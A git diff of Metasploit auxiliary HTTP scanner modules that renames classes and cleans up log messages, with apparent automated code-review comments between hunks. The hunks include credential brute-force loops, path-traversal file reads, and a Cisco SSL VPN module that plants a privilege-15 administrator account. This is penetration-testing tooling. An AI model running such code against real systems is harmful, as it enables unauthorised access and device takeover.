diff --git a/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb b/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb index b24065de3a..f484a2a75f 100644 --- a/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb +++ b/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/brute_dirs.rb b/modules/auxiliary/scanner/http/brute_dirs.rb index 5ffdf2bbdf..e2ecbafdbf 100644 --- a/modules/auxiliary/scanner/http/brute_dirs.rb +++ b/modules/auxiliary/scanner/http/brute_dirs.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'enumerable' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/buffalo_login.rb b/modules/auxiliary/scanner/http/buffalo_login.rb index 26d643853f..8b9aaed703 100644 --- a/modules/auxiliary/scanner/http/buffalo_login.rb +++ b/modules/auxiliary/scanner/http/buffalo_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/buffalo' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb b/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb index b3fb9cfa82..8fba970602 100644 --- a/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb +++ b/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/caidao' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/canon_wireless.rb b/modules/auxiliary/scanner/http/canon_wireless.rb index b9e1cdbf7b..971536a302 100644 --- a/modules/auxiliary/scanner/http/canon_wireless.rb +++ b/modules/auxiliary/scanner/http/canon_wireless.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cert.rb b/modules/auxiliary/scanner/http/cert.rb index 167bb24fc9..414f9c391b 100644 --- a/modules/auxiliary/scanner/http/cert.rb +++ b/modules/auxiliary/scanner/http/cert.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::WmapScanSSL diff --git a/modules/auxiliary/scanner/http/chef_webui_login.rb b/modules/auxiliary/scanner/http/chef_webui_login.rb index e8abdfe8f7..f048863072 100644 --- a/modules/auxiliary/scanner/http/chef_webui_login.rb +++ b/modules/auxiliary/scanner/http/chef_webui_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/chef_webui' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' } ) 
diff --git a/modules/auxiliary/scanner/http/chromecast_webserver.rb b/modules/auxiliary/scanner/http/chromecast_webserver.rb index 5ac407a826..35c1f1af47 100644 --- a/modules/auxiliary/scanner/http/chromecast_webserver.rb +++ b/modules/auxiliary/scanner/http/chromecast_webserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb index fc88a398a0..6dca2a3812 100644 --- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb +++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -38,18 +38,18 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless check_conn? - print_error("#{peer} - Connection failed, Aborting...") + print_error("Connection failed, Aborting...") return end unless is_app_asdm? - print_error("#{peer} - Application does not appear to be Cisco ASA ASDM. Module will not continue.") + print_error("Application does not appear to be Cisco ASA ASDM. Module will not continue.") return end - print_status("#{peer} - Application appears to be Cisco ASA ASDM. Module will continue.") + print_status("Application appears to be Cisco ASA ASDM. Module will continue.") - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end 
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => '/', 'method' => 'GET' }) - print_good("#{peer} - Server is responsive...") + print_good("Server is responsive...") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE return end @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary # Brute-force the login page def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi({ 'uri' => '/+webvpn+/index.html', @@ -138,17 +138,17 @@ class Metasploit3 < Msf::Auxiliary res.body.match(/Success/) && res.body.match(/success/) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - print_error("#{peer} - HTTP Connection Failed, Aborting") + print_error("HTTP Connection Failed, Aborting") return :abort end end diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index 55d0033399..fe3ca21873 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient 
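Review bot: In the -63,7 hunk of cisco_asa_asdm.rb, `print_good("Server is responsive...")` runs whenever `send_request_cgi` does not raise, but `res` is never inspected. If the client returns nil on a timeout (worth confirming against the HttpClient mixin), an unresponsive host is still reported as responsive. Guarding the message, `print_good("Server is responsive...") if res`, and returning a falsy value otherwise would make the check mean what it says. The same pattern is visible in the -83,7 hunk of cisco_ssl_vpn.rb and the -53,7 hunk of cisco_ssl_vpn_priv_esc.rb. The method continues outside the hunk, so the return value may already be handled there.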
diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb index de6c042743..f1442e9410 100644 --- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb index cf49d589a8..4bed3c6cf5 100644 --- a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb +++ b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb index 7f16552941..42e31918dc 100644 --- a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb +++ b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 5ad7ed6458..97aef41367 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
@@ -42,28 +42,28 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless check_conn? - vprint_error("#{peer} - Connection failed, Aborting...") + vprint_error("Connection failed, Aborting...") return false end unless is_app_ssl_vpn? - vprint_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.") + vprint_error("Application does not appear to be Cisco SSL VPN. Module will not continue.") return false end - vprint_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.") + vprint_good("Application appears to be Cisco SSL VPN. Module will continue.") groups = Set.new if datastore['GROUP'].empty? - vprint_status("#{peer} - Attempt to Enumerate VPN Groups...") + vprint_status("Attempt to Enumerate VPN Groups...") groups = enumerate_vpn_groups if groups.empty? - vprint_warning("#{peer} - Unable to enumerate groups") - vprint_warning("#{peer} - Using the default group: DefaultWEBVPNGroup") + vprint_warning("Unable to enumerate groups") + vprint_warning("Using the default group: DefaultWEBVPNGroup") groups << "DefaultWEBVPNGroup" else - vprint_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}") + vprint_good("Enumerated VPN Groups: #{groups.to_a.join(", ")}") end else @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary end groups << "" - vprint_status("#{peer} - Starting login brute force...") + vprint_status("Starting login brute force...") groups.each do |group| each_user_pass do |user, pass| do_login(user, pass, group) @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary def check_conn? begin res = send_request_cgi('uri' => '/', 'method' => 'GET') - vprint_good("#{peer} - Server is responsive...") + vprint_good("Server is responsive...") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, 
@@ -187,7 +187,7 @@ class Metasploit3 < Msf::Auxiliary # Brute-force the login page def do_login(user, pass, group) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}") begin cookie = "webvpn=; " + @@ -208,29 +208,29 @@ class Metasploit3 < Msf::Auxiliary post_params['group_list'] = group unless group.empty? - resp = send_request_cgi( - 'uri' => '/+webvpn+/index.html', - 'method' => 'POST', - 'ctype' => 'application/x-www-form-urlencoded', - 'cookie' => cookie, - 'vars_post' => post_params - ) + res = send_request_cgi( + 'uri' => '/+webvpn+/index.html', + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'cookie' => cookie, + 'vars_post' => post_params + ) - if resp && - resp.code == 200 && - resp.body.match(/SSL VPN Service/) && - resp.body.match(/webvpn_logout/i) + if res && + res.code == 200 && + res.body.match(/SSL VPN Service/) && + res.body.match(/webvpn_logout/i) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") - do_logout(resp.get_cookies) + do_logout(res.get_cookies) report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) report_note(ip: rhost, type: 'cisco.cred.group', data: "User: #{user} / Group: #{group}") return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") end rescue ::Rex::ConnectionRefused, @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Auxiliary ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return :abort end end 
diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb index 505933f1fd..31fa2d011b 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' ) - vprint_good("#{peer} - Server is responsive") + vprint_good("Server is responsive") rescue ::Rex::ConnectionError, ::Errno::EPIPE return false end @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 - vprint_good("#{peer} - Logged out") + vprint_good("Logged out") end end @@ -117,8 +117,8 @@ class Metasploit3 < Msf::Auxiliary resp.body.include?('Cisco Adaptive Security Appliance Software Version') return resp.body else - vprint_error("#{peer} - Unable to run '#{command}'") - vprint_good("#{peer} - Retrying #{i} '#{command}'") unless i == 2 + vprint_error("Unable to run '#{command}'") + vprint_good("Retrying #{i} '#{command}'") unless i == 2 end end 
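Review bot: The retry message in the -117,8 hunk is suppressed with `unless i == 2`, a hard-coded last index, while the matching loop in the -130,18 hunk uses `unless i == tries - 1`. The loop header is outside this hunk, but if it also iterates over a configurable attempt count, the literal prints "Retrying" after the final attempt or skips it mid-run whenever that count is not 3. Using `unless i == tries - 1` here would keep the two loops consistent.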
@@ -130,18 +130,18 @@ class Metasploit3 < Msf::Auxiliary password = Rex::Text.rand_text_alphanumeric(20) tries.times do |i| - vprint_good("#{peer} - Attemping to add User: #{username}, Pass: #{password}") + vprint_good("Attemping to add User: #{username}, Pass: #{password}") command = "username #{username} password #{password} privilege 15" resp = run_command(command, cookie) if resp && !resp.body.include?('Command authorization failed') && !resp.body.include?('Command failed') - vprint_good("#{peer} - Privilege Escalation Appeared Successful") + vprint_good("Privilege Escalation Appeared Successful") return [username, password] else - vprint_error("#{peer} - Unable to run '#{command}'") - vprint_good("#{peer} - Retrying #{i} '#{command}'") unless i == tries - 1 + vprint_error("Unable to run '#{command}'") + vprint_good("Retrying #{i} '#{command}'") unless i == tries - 1 end end @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Auxiliary resp.body.include?('SSL VPN Service') && resp.body.include?('webvpn_logout') - vprint_good("#{peer} - Logged in with User: #{datastore['USERNAME']}, Pass: #{datastore['PASSWORD']} and Group: #{datastore['GROUP']}") + vprint_good("Logged in with User: #{datastore['USERNAME']}, Pass: #{datastore['PASSWORD']} and Group: #{datastore['GROUP']}") return resp.get_cookies else return false @@ -195,7 +195,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) # Validate we're dealing with Cisco SSL VPN unless validate_cisco_ssl_vpn - vprint_error("#{peer} - Does not appear to be Cisco SSL VPN") + vprint_error("Does not appear to be Cisco SSL VPN") return end @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary # interimittent based on session, so we'll just retry # 'X' times. datastore['RETRIES'].times do |i| - vprint_good("#{peer} - Exploit Attempt ##{i}") + vprint_good("Exploit Attempt ##{i}") # Authenticate to SSL VPN and get session cookie cookie = do_login( 
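Review bot: The verbose message in the -181,7 hunk interpolates `datastore['PASSWORD']` in clear text, and the -130,18 hunk does the same with the generated `password`. Any console spool or log captured during an engagement therefore holds working credentials for the device. The later hunk shows `report_escalated_creds(user, pass)`, which presumably persists them in the credential store, so the messages could name only the account: `vprint_good("Logged in with User: #{datastore['USERNAME']} and Group: #{datastore['GROUP']}")`. The string in the -130,18 hunk also has a typo, "Attemping", which should read "Attempting".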
@@ -214,7 +214,7 @@ class Metasploit3 < Msf::Auxiliary # See if our authentication attempt failed unless cookie - vprint_error("#{peer} - Failed to login to Cisco SSL VPN") + vprint_error("Failed to login to Cisco SSL VPN") next end @@ -223,10 +223,10 @@ class Metasploit3 < Msf::Auxiliary if version && version_match = version.match(/Cisco Adaptive Security Appliance Software Version ([\d+\.\(\)]+)/) - print_good("#{peer} - Show version succeeded. Version is Cisco ASA #{version_match[1]}") + print_good("Show version succeeded. Version is Cisco ASA #{version_match[1]}") else do_logout(cookie) - vprint_error("#{peer} - Show version failed") + vprint_error("Show version failed") next end @@ -235,11 +235,11 @@ class Metasploit3 < Msf::Auxiliary do_logout(cookie) if creds - print_good("#{peer} - Successfully added level 15 account #{creds.join(", ")}") + print_good("Successfully added level 15 account #{creds.join(", ")}") user, pass = creds report_escalated_creds(user, pass) else - vprint_error("#{peer} - Failed to created user account on Cisco SSL VPN") + vprint_error("Failed to created user account on Cisco SSL VPN") end end end diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index a351f737aa..4f48e3a7a8 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] f = datastore['FILE'] 
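Review bot: The context line `peer = "#{ip}:#{rport}"` in the -47,7 hunk of clansphere_traversal.rb is left in place although every `#{peer}` use visible in this file's hunks has been removed. If nothing outside the hunks still reads it, the assignment is dead and shadows whatever `peer` the included mixins provide, so it should be deleted in the same change. run_host's body extends beyond the hunk, so confirm there is no remaining reader first.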
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.body =~ /^Fatal error\:/ - print_error("#{peer} - Unable to read '#{datastore['FILE']}', possibily because:") + print_error("Unable to read '#{datastore['FILE']}', possibily because:") print_error("\t1. File does not exist.") print_error("\t2. No permission.") print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.") @@ -78,10 +78,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") else - print_error("#{peer} - Fail to obtain file for some unknown reason") + print_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index c7517d32f1..5fd71d7fbc 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/coldfusion_version.rb b/modules/auxiliary/scanner/http/coldfusion_version.rb index b27972d810..c24e425ffa 100644 --- a/modules/auxiliary/scanner/http/coldfusion_version.rb +++ b/modules/auxiliary/scanner/http/coldfusion_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/concrete5_member_list.rb b/modules/auxiliary/scanner/http/concrete5_member_list.rb index 15d9170e91..1198f3b850 100644 --- a/modules/auxiliary/scanner/http/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/http/concrete5_member_list.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/copy_of_file.rb b/modules/auxiliary/scanner/http/copy_of_file.rb index 27d2ea545c..e528752cf4 100644 --- a/modules/auxiliary/scanner/http/copy_of_file.rb +++ b/modules/auxiliary/scanner/http/copy_of_file.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index ac9ac083f0..b3854ca22b 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::HttpCrawler diff --git a/modules/auxiliary/scanner/http/dell_idrac.rb b/modules/auxiliary/scanner/http/dell_idrac.rb index 0bbc7ecf82..7d60b0886b 100644 --- a/modules/auxiliary/scanner/http/dell_idrac.rb +++ b/modules/auxiliary/scanner/http/dell_idrac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/dir_listing.rb b/modules/auxiliary/scanner/http/dir_listing.rb index b759eb9fc3..609ab232b9 100644 --- a/modules/auxiliary/scanner/http/dir_listing.rb +++ b/modules/auxiliary/scanner/http/dir_listing.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir 
diff --git a/modules/auxiliary/scanner/http/dir_scanner.rb b/modules/auxiliary/scanner/http/dir_scanner.rb index 4c2263dba7..2ac59737ac 100644 --- a/modules/auxiliary/scanner/http/dir_scanner.rb +++ b/modules/auxiliary/scanner/http/dir_scanner.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'thread' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb index 36f44b069b..e5ef0dc135 100644 --- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb index a64f3b8a87..cd5d8c4308 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb index 8816247bf2..d5db9ee957 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb index f2e2ad293a..5651a583a7 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb b/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb index ebf3838a7b..5888615617 100644 --- a/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb +++ b/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb index 8acee32259..e56dd50a64 100644 --- a/modules/auxiliary/scanner/http/dolibarr_login.rb +++ b/modules/auxiliary/scanner/http/dolibarr_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -90,11 +90,11 @@ class Metasploit3 < Msf::Auxiliary # sid, token = get_sid_token if sid.nil? or token.nil? - vprint_error("#{peer} - Unable to obtain session ID or token, cannot continue") + vprint_error("Unable to obtain session ID or token, cannot continue") return :abort else - vprint_status("#{peer} - Using sessiond ID: #{sid}") - vprint_status("#{peer} - Using token: #{token}") + vprint_status("Using sessiond ID: #{sid}") + vprint_status("Using token: #{token}") end begin 
@@ -114,22 +114,22 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT - vprint_error("#{peer} - Service failed to respond") + vprint_error("Service failed to respond") return :abort end if res.nil? - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return :abort end location = res.headers['Location'] if res and res.headers and (location = res.headers['Location']) and location =~ /admin\// - print_good("#{peer} - Successful login: \"#{user}:#{pass}\"") + print_good("Successful login: \"#{user}:#{pass}\"") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.headers['Location']) return :next_user else - vprint_error("#{peer} - Bad login: \"#{user}:#{pass}\"") + vprint_error("Bad login: \"#{user}:#{pass}\"") return end end @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) each_user_pass { |user, pass| - vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") + vprint_status("Trying \"#{user}:#{pass}\"") do_login(user, pass) } end diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb index 56412ba3f2..de97da4895 100644 --- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb +++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary if res.body.include?('Access denied') # This probably means the Views Module actually isn't installed - print_error("#{peer} - Access denied") + print_error("Access denied") return Exploit::CheckCode::Safe elsif res.message != 'OK' || res.body != '[ ]' return Exploit::CheckCode::Safe 
